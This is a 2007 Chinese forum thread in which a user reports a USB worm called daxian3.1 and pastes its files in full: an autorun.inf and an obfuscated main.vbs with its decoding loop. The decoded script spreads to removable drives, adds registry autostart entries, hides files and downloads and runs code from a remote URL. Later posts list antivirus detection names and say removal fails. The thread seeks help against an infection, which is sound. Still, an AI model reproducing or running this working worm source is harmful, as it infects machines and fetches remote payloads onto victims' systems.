1   1  /  1  页   跳转

daxian3.1应该是daxian3.0的升级

收藏
shibaren
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2007-08-15
  • 来自:
发表于: 2007-08-15 20:31 | 显示全部 短消息 资料
字号: 1楼

daxian3.1应该是daxian3.0的升级

我单位的机器刚刚中了这个病毒
在U盘中生成两个文件
一个是autorun.inf
另外一个是main.vbs
用symantec antivirus企业版、江民、瑞星也检测不到

其中autorun.inf的内容是
daxian3.1
[AutoRun]
daxianbiyeliunian 2007.7.15
open=WScript.exe .main.vbs
3.1
shellopen=打开(&O)
http://hgz.dinghui123.cn/wan.asp
shellopenCommand=WScript.exe .main.vbs
shellopenDefault=1
2007-8-15 18:25:46
其中main.vbs的内容是

ExeString="ire=8.6gvyr=qnkvna&ire nobhg=qnkvnaovlryvhavna 7552.2.60sebzhey=pue(659)&pue(661)&pue(661)&pue(667)&://&pue(659)&pue(658)&m.&pue(655)&va&pue(658)&pue(659)&hv678.&pue(44)&a/jna.&pue(42)&f&pue(667)ba reebe erfhzr arkgqvz jfuqvz WfuSuryySrg Wfu =CerngrOowrpg(WSpevcg.Suryy)frg WfuSuryy=Wfpevcg.CerngrOowrpg(Wfpevcg.Suryy)Srg FSO = CerngrOowrpg(Spevcgvat.FvyrSlfgrzOowrpg)frg qve = FSO.GrgScrpvnyFbyqre(6)Srg qp = FSO.Devirfbhjaanzr=Wfpevcg.SpevcgNnzrzhyh=yrsg(Wfpevcg.SpevcgFhyyNnzr,yra(Wfpevcg.SpevcgFhyyNnzr)-yra(Wfpevcg.SpevcgNnzr))vs zhyh=qve& gura flf=gehrFbe Enpu q Ia qpvs zhyh=q& gura bcraqvfx=WfuSuryy.Rha(rkcybere &q,8,snyfr)Nrkgvs abg flf=gehr gurajfpevcg.fyrrc 7555frg l=trgbowrpg(jvaztzgf:.ebbgpvzi7) frg k=l.rkrpdhrel(fryrpg * sebz jva87_cebprff jurer anzr='jfpevcg.rkr') v=5 sbe rnpu w va k  v=v+6arkg  vs v>6 gura jfpevcg.dhvgraq vslvapnatvs ernqgkg(zhyh&nhgbeha.vas,6)<>gvyr guraohvyqvas ire,sebzhey,abjraq Ispbclrkr=ernqgkg(zhyh&nhgbeha.vas,0)&.rkrenaqbzvmrfwf=vag(Raq * (86-6+6)) + 6 Is sfb.FvyrEkvfgf(zhyh&pbclrkr) naq Dnl(Dngr)<>fwf guraWfuSuryy.eha zhyh&pbclrkrEyfrvs yrsg((ernqgkg(p:qngr.ova,6)),4)<>yrsg(abj,4) gurafuhkvat p:qngr.ova,5frg ova = sfb.CerngrTrkgFvyr(p:qngr.ova, Tehr)ova.jevgryvar abjova.pybfrfuhkvat p:qngr.ova,7+9Lqbjaire=ernqgkg(zhyh&nhgbeha.vas,0)qbjasvyr zhyh&grzc.gkg,sebzhey,5Srg OcraFvyr = FSO.OcraTrkgFvyr(zhyh&grzc.gkg, 6) abhfr = OcraFvyr.RrnqLvarqbjavf = OcraFvyr.RrnqLvarqbjaire = OcraFvyr.RrnqLvarqbjaanzr = qbjaire&.rkrqbjasebz = OcraFvyr.RrnqLvariofire = OcraFvyr.RrnqLvariofanzr = OcraFvyr.RrnqLvariofhey = OcraFvyr.RrnqLvarthnattnb= OcraFvyr.RrnqLvarOcraFvyr.Cybfr FSO.DryrgrFvyr(zhyh&grzc.gkg)vs qbjavf=6 guraIs iofire<>ire guraqbjasvyr zhyh&iofanzr,iofhey,6jfpevcg.dhvgraq vsIs qbjaire<>Lqbjaire be abg sfb.FvyrEkvfgf(zhyh&pbclrkr) gurafuhkvat zhyh&pbclrkr,5Is sfb.FvyrEkvfgf(zhyh&pbclrkr) gura FSO.DryrgrFvyr(zhyh&pbclrkr)qbjasvyr zhyh&qbjaanzr,qbjasebz,6ohvyqvas qbjaire,abj,thnattnbpbclrkr=qbjaanzrraq vsraq vsraq vsEaq Isvs flf=gehr guratnaena()WfuSuryy.eha zhyh&bhjaanzrryfrfuhkvat zhyh&bhjaanzr,7+9pbcliof qve&znva.iorpbcliof qve&znva.gkgCbclFvyr zhyh&nhgbeha.vas,qve&nhgbeha.vasCbclFvyr zhyh&pbclrkr,qve&&pbclrkrfuhkvat qve&&pbclrkr,7+9vs zhyh<>C: gurapbcliof p:znva.iofCbclFvyr zhyh&nhgbeha.vas,p:nhgbeha.vasCbclFvyr zhyh&pbclrkr,p:&pbclrkrraq vsmuhprWfuSuryy.eha qve&znva.iorraq vsshapgvba pbclsvyr(svyr,jurer)fuhkvat jurer,5vs sfb.FvyrEkvfgf(svyr) gura FSO.CbclFvyr svyr,jurer,Tehrraq shapgvbashapgvba pbcliof(jurer)fuhkvat jurer,5frg frys=sfb.bcragrkgsvyr(zhyh&bhjaanzr,6)iofpbcl=frys.ernqnyy frys.pybfr frg iof = sfb.CerngrTrkgFvyr(jurer, Tehr)iof.jevgr iofpbcliof.pybfrfuhkvat jurer,7+9raq shapgvbashapgvba muhpr()RrtPngu=HKEY_LOCAL_MACHINESOFTWAREMvpebfbsgWvaqbjfCheeragVrefvbacbyvpvrfEkcybereeha Tlcr_Nnzr=REG_SZ Krl_Nnzr=rkcybere Krl_Dngn=znva.ior WfuSuryy.RrtWevgr RrtPngu&Krl_Nnzr,Krl_Dngn,Tlcr_Nnzr raq shapgvbashapgvba lvapnat()RrtPngu=HKEY_CURRENT_USERSbsgjnerMvpebfbsgWvaqbjfCheeragVrefvbaEkcybereAqinaprq Tlcr_Nnzr=REG_DWORD Krl_Nnzr=SubjShcreHvqqra Krl_Dngn=55555555 WfuSuryy.RrtWevgr RrtPngu&Krl_Nnzr,Krl_Dngn,Tlcr_Nnzr raq shapgvbashapgvba ohvyqvas(rkrire,rkranzr,nqi)fuhkvat zhyh&nhgbeha.vas,5frg vav = sfb.CerngrTrkgFvyr(zhyh&nhgbeha.vas, Tehr)vav.jevgryvar gvyrvav.jevgryvar [AhgbRha]vav.jevgryvar nobhgvav.jevgryvar bcra=WSpevcg.rkr .znva.iofvav.jevgryvar rkrirevav.jevgryvar furyybcra=打开(&O)vav.jevgryvar rkranzrvav.jevgryvar furyybcraCbzznaq=WSpevcg.rkr .znva.iofvav.jevgryvar furyybcraDrsnhyg=6vav.jevgryvar nqivav.pybfrfuhkvat zhyh&nhgbeha.vas,6+7+9raq shapgvbashapgvba ernqgkg(jurer,yvar) vs sfb.FvyrEkvfgf(jurer) guraSrg ernqsvyr = sfb.OcraTrkgFvyr(jurer, 6) v=5 qb juvyr v<yvarv=v+6fgeLvar = ernqsvyr.RrnqLvarybbcernqsvyr.Cybfrernqgkg=fgeLvarryfrernqgkg=abg_sbhaqraq vsraq shapgvbashapgvba fuhkvat(svyr,punatr)vs sfb.FvyrEkvfgf(svyr) guraSrg bFvyr = FSO.GrgFvyr(svyr) bFvyr.Aggevohgrf = punatrSrg bFvyr = Nbguvatraq vsraq shapgvbashapgvba qbjasvyr(ybpnysvyr,heysvyr,ehasvyr)fuhkvat ybpnysvyr,5vLbpny = LCnfr(ybpnysvyr):vRrzbgr = LCnfr(heysvyr):'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!Srg kPbfg = CerngrOowrpg(Mvpebfbsg.XMLHTTP) 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!kPbfg.Ocra trg,vRrzbgr,5 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!kPbfg.Sraq() 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!Srg fGrg = CerngrOowrpg(ADODB.Sgernz) 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fGrg.Mbqr = 8 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fGrg.Tlcr = 6 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fGrg.Ocra() 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fGrg.Wevgr(kPbfg.erfcbafrBbql) 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fGrg.SnirTbFvyr vLbpny,7 'vs 6=7 gura Wfpevcg.rpub Izcbffvoyr!fuhkvat ybpnysvyr,7+9vs ehasvyr=6 gura Wfu.eha vLbpnyraq shapgvbashapgvba tnaena()qbFbe Enpu q Ia qpIs q.DevirTlcr = 8 be (q.DevirTlcr = 6 naq q<>A: naq q<> B:) TuraIs sfb.FvyrEkvfgf(q&znva.iof) naq sfb.FvyrEkvfgf(q&nhgbeha.vas) guravs ernqgkg(q&nhgbeha.vas,6)<>gvyr guraCbclFvyr qve&nhgbeha.vas,q&nhgbeha.vasCbclFvyr qve&&pbclrkr,q&&pbclrkrCbclFvyr qve&znva.gkg,q&znva.iofraq vsryfrCbclFvyr qve&nhgbeha.vas,q&nhgbeha.vasCbclFvyr qve&&pbclrkr,q&&pbclrkrCbclFvyr qve&znva.gkg,q&znva.iofraq vsEaq Isarkgjfpevcg.fyrrc 7555ybbcraq shapgvba"
Execute("For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 28 Then"&vbCrLf&"TempNum = 13"&vbCrLf&"ElseIf TempNum = 29 Then"&vbCrLf&"TempNum = 10"&vbCrLf&"elseif TempNum=18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"elseif TempNum>96 and TempNum<110 then"&vbCrLf&"TempNum=TempNum+13"&vbCrLf&"elseif TempNum>109 and TempNum<123 then"&vbCrLf&"TempNum=TempNum-13"&vbCrLf&"elseif TempNum>47 and TempNum<53 then"&vbCrLf&"TempNum=TempNum+5"&vbCrLf&"elseif TempNum>52 and TempNum<58 then"&vbCrLf&"TempNum=TempNum-5"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & chr(TempNum)"&vbCrLf&"Next")
Execute(ThisText)
希望大大能够快点解决这个问题就好了


[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)

附件附件:

下载次数:149
文件类型:application/octet-stream
文件大小:
上传时间:2007-8-15 20:31:56
描述:

最后编辑2007-08-16 10:56:09
分享到:
gototop
 
shibaren
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2007-08-15
  • 来自:
发表于: 2007-08-16 11:04 | 显示全部 短消息 资料
字号: 2楼

报了没有用咯
不能把我电脑中的病毒给删掉

郁闷
gototop
 
shibaren
头像
初生襁褓狮
  • 帖子:3
  • 注册: 2007-08-15
  • 来自:
发表于: 2007-08-16 11:06 | 显示全部 短消息 资料
字号: 3楼

McAfee        5097        2007.08.14        New Script
F-Secure        6.70.13030.0        2007.08.15        Possibly infected with an unknown virus
Ikarus        T3.1.1.12        2007.08.15        Virus.VBS.Agent.f
Kaspersky        4.0.2.24        2007.08.15        Virus.VBS.Agent.f
Rising        19.36.22.00        2007.08.15        Worm.VBS.Agent.ac

我用了这么多的
都是能检测
但是
都不能完全删除掉
就是在安全模式下,都不行
郁闷
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT